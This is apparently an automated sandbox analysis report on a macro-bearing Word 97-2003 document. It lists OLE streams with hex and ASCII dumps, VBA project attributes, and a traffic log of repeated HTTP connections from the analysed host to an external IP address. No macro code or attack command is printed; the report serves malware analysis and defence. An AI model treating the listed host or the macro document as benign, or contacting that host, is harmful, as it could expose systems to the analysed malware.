                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ~ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i . s
                                                  Data Raw:01 16 03 00 01 f0 00 00 00 bc 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff c3 02 00 00 17 03 00 00 00 00 00 00 01 00 00 00 80 a0 7e 66 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Attribute VB_Name = "ThisDocument"
                                                  Attribute VB_Base = "1Normal.ThisDocument"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = True
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.235956365095031
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:4096
                                                  Entropy:0.24603193588699912
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:4096
                                                  Entropy:0.42764826164542935
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . . . . . . . . . . m s i n g h . . . . . . .
                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 50 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b4 00 00 00 07 00 00 00 c0 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 e0 00 00 00 12 00 00 00 ec 00 00 00
                                                  General
                                                  Stream Path:1Table
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:11910
                                                  Entropy:5.437056914019578
                                                  Base64 Encoded:True
                                                  Data ASCII:" . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                  Data Raw:22 06 18 00 12 00 01 00 78 01 0f 00 07 00 02 00 02 00 02 00 02 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                  General
                                                  Stream Path:Data
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:4096
                                                  Entropy:2.240134139483634
                                                  Base64 Encoded:False
                                                  Data ASCII:. . $ . . $ . I f . . . . . . . ! v . . h . # v . . . # v . . n . : V . . . d . . . . . . t . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( # 5 . . . . . 5 . . . . n . 2 . . . . . d . 4 . . . . . d . p . . . . . . . . . . . . . . . y t 8 Z . . . $ . . $ . I f . . . . . . . ! v . . h . # v . . . # v . . n . : V . . . d . . . . . . t . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:b9 00 16 24 01 17 24 01 49 66 01 00 00 00 01 96 00 00 21 76 00 02 68 01 23 76 00 01 ba 09 23 76 01 02 6e 19 3a 56 0b 00 02 96 64 00 09 d6 02 00 01 0a 74 00 00 00 06 12 d6 0a 00 00 00 ff ef ef ef 00 00 00 13 d6 30 00 00 00 00 08 01 00 00 00 00 00 00 08 01 00 00 00 00 00 00 08 01 00 00 00 00 00 00 08 01 00 00 00 00 00 00 08 01 00 00 00 00 00 00 08 01 00 00 14 f6 03 28 23 35 d6 05 00
                                                  General
                                                  Stream Path:Macros/PROJECT
                                                  CLSID:
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:415
                                                  Entropy:5.3595238610832
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { F 1 2 C 7 E D C - D A C C - 4 2 B 3 - B C F C - E 3 B F 5 5 5 7 3 2 5 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 4 6 6 5 C C 4 E C 1 A F 0 1 A F 0 1 A F 0 1 A F 0 " . . D P B = " B E B C 8 6 A E B A 5 2 1 5 5 3 1 5 5 3 1 5 " . . G C = " 1 8 1 A 2 0 5 3 2 1 5 3 2 1 A C " . . . . [ H
                                                  Data Raw:49 44 3d 22 7b 46 31 32 43 37 45 44 43 2d 44 41 43 43 2d 34 32 42 33 2d 42 43 46 43 2d 45 33 42 46 35 35 35 37 33 32 35 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                                                  General
                                                  Stream Path:Macros/PROJECTwm
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:71
                                                  Entropy:3.3485999524807437
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                                  General
                                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:2621
                                                  Entropy:4.088385632500396
                                                  Base64 Encoded:False
                                                  Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                                                  Data Raw:cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                  General
                                                  Stream Path:Macros/VBA/__SRP_0
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:1466
                                                  Entropy:3.4249480436317956
                                                  Base64 Encoded:False
                                                  Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ " n . D ! , s . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                  General
                                                  Stream Path:Macros/VBA/__SRP_1
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:122
                                                  Entropy:1.4349250578778767
                                                  Base64 Encoded:False
                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                  General
                                                  Stream Path:Macros/VBA/__SRP_2
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:249
                                                  Entropy:1.3037104006475733
                                                  Base64 Encoded:False
                                                  Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . 4 . . . . . . . . . . . . . . .
                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 01 00 01 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                                  General
                                                  Stream Path:Macros/VBA/__SRP_3
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:156
                                                  Entropy:1.5811533511839717
                                                  Base64 Encoded:False
                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                  General
                                                  Stream Path:Macros/VBA/dir
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:571
                                                  Entropy:6.336595827763675
                                                  Base64 Encoded:True
                                                  Data ASCII:. 7 . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . _ i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . . _ i . . . ! O f f i c . g O . f . i . c .
                                                  Data Raw:01 37 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 c4 d5 5f 69 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                  General
                                                  Stream Path:WordDocument
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:39943
                                                  Entropy:5.645461092452575
                                                  Base64 Encoded:True
                                                  Data ASCII:. k . . . . . . . . . . . . . . . . . . . . . 4 . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . , j . , j & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . E . . . < . . . . . . | . . . . . . . . . . . B ) . . < . . . . .
                                                  Data Raw:ec a5 c1 00 6b 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 34 14 00 00 0e 00 62 6a 62 6a ac c8 ac c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 07 9c 00 00 ce a2 2c 6a ce a2 2c 6a 26 0c 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 21, 2024 00:13:12.393398046 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:12.550424099 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:12.550508976 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:12.551276922 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:12.675808907 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905493021 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905742884 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905780077 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905869007 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905916929 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:13.905922890 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905958891 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.905993938 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.906001091 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:13.906029940 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.906044006 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:13.906512022 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:13.906534910 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.906570911 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:13.908693075 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.025706053 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.025846958 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.026443958 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.031132936 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.033389091 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.035901070 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.097589016 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.097630024 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.100574017 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.102817059 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.102861881 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.103063107 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.109046936 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.109087944 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.110300064 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.117481947 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.117623091 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.124866009 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.125916958 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.126009941 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.132740974 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.134500980 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.134581089 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.137121916 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.143100023 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.143212080 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.144687891 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.151695967 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.151814938 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.152255058 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.160303116 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.160362005 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.160535097 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.168734074 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.168862104 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.168939114 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.177150011 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.177208900 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.182163000 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.185631037 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.185672045 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.192687035 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.266208887 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.266247034 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.273246050 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.293257952 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.293617010 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.294858932 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.294894934 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.295062065 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.295062065 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.297763109 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.297851086 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.301577091 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.301619053 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.301709890 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.303206921 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.306071043 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.306199074 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.310610056 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.310651064 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.310726881 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.312833071 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.315191031 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.315330982 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.317111969 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.319782972 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.319880962 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.321403980 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.324531078 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.324644089 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.328834057 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.328876019 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.328989029 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.333568096 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.333612919 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.333686113 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.335612059 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.337928057 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.338022947 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.341136932 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.342482090 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.342597961 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.345411062 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.347027063 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.347115040 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.349292994 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.351577997 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.351686954 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.351757050 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.356138945 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.356323004 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.360660076 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.360702991 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.360780954 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.360976934 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.365236044 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.365341902 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.365523100 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.369764090 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.369875908 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.374319077 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.374351978 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.374427080 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.376966000 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.378870964 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.378961086 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.381556034 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:14.392884016 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.392981052 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:14.393558979 CET4973880192.168.2.491.208.206.195
